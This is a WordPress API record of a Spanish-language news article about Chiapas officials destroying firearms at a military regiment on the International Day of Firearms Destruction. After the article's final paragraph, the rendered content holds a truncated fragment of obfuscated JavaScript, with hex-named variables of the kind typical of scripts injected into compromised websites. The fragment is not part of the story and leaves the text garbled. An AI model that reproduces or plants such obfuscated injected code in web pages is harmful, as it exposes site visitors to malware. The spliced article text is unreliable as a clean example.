{"id":22900,"date":"2025-07-10T04:17:31","date_gmt":"2025-07-10T04:17:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22900"},"modified":"2025-07-10T04:17:32","modified_gmt":"2025-07-10T04:17:32","slug":"importante-el-esfuerzo-conjunto-en-acciones-por-la-seguridad-y-la-cultura-de-paz-juan-carlos-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22900","title":{"rendered":"Importante el esfuerzo conjunto en acciones por la seguridad y la cultura de paz: Juan Carlos Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-1024x681.jpg\" alt=\"\" class=\"wp-image-22901\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000214324-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n<\/p>\n\n\n\n<p>9 de julio del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, junto al gobernador Eduardo Ram\u00edrez Aguilar y al comandante de la VII Regi\u00f3n Militar, general de Brigada DEM Alejandro Vargas Gonz\u00e1lez, conmemoraron el D\u00eda Internacional de la Destrucci\u00f3n de Armas de Fuego, en un acto protocolario de inspecci\u00f3n y destrucci\u00f3n de armas, realizado en las instalaciones del 3er Regimiento de Artiller\u00eda, \u201cEl Sabino\u201d.<\/p>\n\n\n\n<p>En el marco de este acto, el magistrado presidente Moreno Guill\u00e9n subray\u00f3 que esta fecha es una oportunidad para recordar el importante papel de las instituciones en promover, desde el esfuerzo conjunto, la responsabilidad por la construcci\u00f3n de un estado de derecho legal y humanista, donde el respeto a la vida prevalezca.<\/p>\n\n\n\n<p>Con esta participaci\u00f3n, el Poder Judicial refrenda su compromiso con la justicia, trabajando de manera coordinada con los distintos niveles de gobierno y las fuerzas armadas, para seguir fortaleciendo una cultura de paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n 9 de julio del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, junto al gobernador Eduardo Ram\u00edrez Aguilar y al comandante de la VII Regi\u00f3n Militar, general de Brigada DEM Alejandro Vargas Gonz\u00e1lez, conmemoraron el D\u00eda Internacional de la Destrucci\u00f3n de Armas de Fuego, en un acto protocolario de inspecci\u00f3n y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22901,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22900","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22900","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22900"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22900\/revisions"}],"predecessor-version":[{"id":22902,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22900\/revisions\/22902"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22901"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22900"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22900"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22900"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}